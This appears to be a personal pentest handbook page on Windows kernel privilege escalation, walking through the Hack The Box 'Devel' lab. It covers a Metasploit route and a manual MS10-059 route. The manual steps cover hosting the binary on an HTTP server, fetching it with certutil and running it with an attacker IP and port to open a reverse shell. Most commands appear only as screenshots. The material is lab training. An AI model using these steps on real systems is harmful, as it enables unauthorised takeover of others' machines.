handbook/tools/5.Machine/2.Windows/Notes/3.Kernel-Exploits.md
2024-08-31 01:07:22 +02:00

55 lines
1.5 KiB
Markdown

## Overview
![[image.BPHLW1.png]]
![[image.O2EHW1.png]]
- The reason we need "system info" is because there are specific kernel exploits depending on the Windows build.
- If we own the Kernel, we own the system - that's what we are trying to do.
## Escalation with Metasploit (Example - Devel HTB)
1. Background the meterpreter session2. Search and use the exploit you found by priv suggester
![[image.BPVLW1.png]]
2. Search and use the exploit you found by priv suggester
![[image.GMWMW1.png]]
3. Set the appropriate meterpreter session (and the other options)
![[image.T59QW1.png]]
4. Run and get another meterpreter session!
![[image.ILWHW1.png]]
5. Be root
![[image.1GM9V1.png]]
## Manual Kernel Exploitation (Devel - HTB)
1. Search for the specific kernel exploit in Google
- ms10-015 doesn't work because we don't have GUI access
- so keep working through them & researching each one
- Rest of example is with MS10-059 (chimichurri exploit)
2. Downloaded the .exe to attacking machine
![[image.59C9V1.png]]
3. Set up Python HTTP server on attacking machine to host the file for victim to download
4. Go to temp folder (likely have write access here)
![[image.ZQL8V1.png]]
5. Download the file with certutil command (similar to wgeton Linux)
![[image.MLLGW1.png]]
6. Run the command with proper syntax (ms.exe <attacker_IP> <attacker_port>)
![[image.PR0HW1.png]]
7. On attacking machine, open another shell with the correct
port
![[image.EEODW1.png]]
8. Become root!
![[image.TYR6V1.png]]